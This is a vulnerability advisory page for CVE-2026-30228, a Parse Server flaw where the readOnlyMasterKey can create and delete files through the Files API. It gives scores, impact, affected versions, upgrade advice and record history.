Description
Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.5 and 9.5.0-alpha.3, the readOnlyMasterKey can be used to create and delete files via the Files API (POST /files/:filename, DELETE /files/:filename). This bypasses the read-only restriction which violates the access scope of the readOnlyMasterKey. Any Parse Server deployment that uses readOnlyMasterKey and exposes the Files API is affected. An attacker with access to the readOnlyMasterKey can upload arbitrary files or delete existing files. This issue has been patched in versions 8.6.5 and 9.5.0-alpha.3.
Published: 2026-03-06
Score: 6.9 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Unauthorized file upload and deletion via readOnlyMasterKey bypass
Action: Immediate Patch
AI Analysis

Impact

Parse Server allows an attacker with a readOnlyMasterKey to create or delete files through the Files API, violating the intended read‑only restriction. This enables an attacker to upload arbitrary files or erase critical files, compromising data integrity and availability.

Affected Systems

Parse Server from parse-community is impacted; any release prior to 8.6.5 and 9.5.0‑alpha.3 that exposes the Files API and uses the readOnlyMasterKey is vulnerable.

Risk and Exploitability

The CVSS score is 6.9, indicating moderate severity, but the EPSS score is below 1% and it is not listed in KEV, suggesting low exploit probability. The vulnerability can be leveraged remotely by sending POST or DELETE requests to /files/:filename with the readOnlyMasterKey, provided the API is exposed. The attacker must have access to the key, so compromise or insufficient secrecy of the key are prerequisites.

Generated by OpenCVE AI on April 16, 2026 at 11:14 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Parse Server to version 8.6.5 or later; if using a 9.5.0‑alpha release, upgrade to 9.5.0‑alpha.3.
  • As a temporary control, restrict or block the Files API for accounts that possess the readOnlyMasterKey, or enforce role‑based access so that readOnlyMasterKey cannot be used for file manipulation.
  • If the readOnlyMasterKey is not required, revoke or rotate the key to prevent unauthorized usage.

Generated by OpenCVE AI on April 16, 2026 at 11:14 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-xfh7-phr7-gr2x parse-server's file creation and deletion bypasses `readOnlyMasterKey` write restriction
History

Wed, 11 Mar 2026 12:45:00 +0000

Type Values Removed Values Added
First Time appeared Parseplatform
Parseplatform parse-server
CPEs cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*
cpe:2.3:a:parseplatform:parse-server:9.5.0:alpha1:*:*:*:node.js:*:*
cpe:2.3:a:parseplatform:parse-server:9.5.0:alpha2:*:*:*:node.js:*:*
Vendors & Products Parseplatform
Parseplatform parse-server
Metrics cvssV3_1

{'score': 4.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N'}

Mon, 09 Mar 2026 21:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Mon, 09 Mar 2026 10:15:00 +0000

Type Values Removed Values Added
First Time appeared Parse Community
Parse Community parse Server
Vendors & Products Parse Community
Parse Community parse Server

Fri, 06 Mar 2026 20:45:00 +0000

Type Values Removed Values Added
Description Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.5 and 9.5.0-alpha.3, the readOnlyMasterKey can be used to create and delete files via the Files API (POST /files/:filename, DELETE /files/:filename). This bypasses the read-only restriction which violates the access scope of the readOnlyMasterKey. Any Parse Server deployment that uses readOnlyMasterKey and exposes the Files API is affected. An attacker with access to the readOnlyMasterKey can upload arbitrary files or delete existing files. This issue has been patched in versions 8.6.5 and 9.5.0-alpha.3.
Title Parse Server: File creation and deletion bypasses `readOnlyMasterKey` write restriction
Weaknesses CWE-863
References
Metrics cvssV4_0

{'score': 6.9, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N'}

Subscriptions

Parse Community Parse Server
Parseplatform Parse-server
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-09T20:34:21.036Z

Reserved: 2026-03-04T17:23:59.797Z

Link: CVE-2026-30228

cve-icon Vulnrichment

Updated: 2026-03-09T20:29:50.333Z

cve-icon NVD

Status : Analyzed

Published: 2026-03-06T21:16:16.767

Modified: 2026-03-11T12:33:58.587

Link: CVE-2026-30228

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-16T11:15:27Z

Weaknesses